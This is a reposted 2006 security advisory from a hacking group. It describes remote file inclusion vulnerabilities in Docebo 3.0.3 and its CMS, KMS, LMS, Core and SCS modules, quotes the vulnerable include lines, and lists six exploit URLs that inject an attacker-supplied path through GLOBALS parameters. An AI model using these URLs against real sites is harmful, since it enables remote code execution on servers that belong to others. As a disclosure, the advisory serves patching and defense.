Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12781
HistoryMay 23, 2006 - 12:00 a.m.

Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities

2006-05-2300:00:00
vulners.com
13

################ DEVIL TEAM THE BEST POLISH TEAM #################
#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: [email protected] or http://www.devilteam.yum.pl
####################################################################
#Docebo Site: http://www.docebocms.org

In All scripts:
[code]
require_once($GLOBALS['where_framework'].'/lib/lib.permission.php');
require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php');
require_once($GLOBALS['where_framework'].'/lib/lib.lang.php');
require_once($GLOBALS['where_framework'].'/lib/lib.template.php');
require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php');
[/code]

#DoceboCMS:

http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]

#DoceboKms:

http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]

http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]

#DoceboLms:

http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]

#DoceboCore:

http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]

#DoceboScs:

http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]

#The End ;-)
#Pozdro Dla wszystkich o ktΓ³rych zapomnia.em ;-)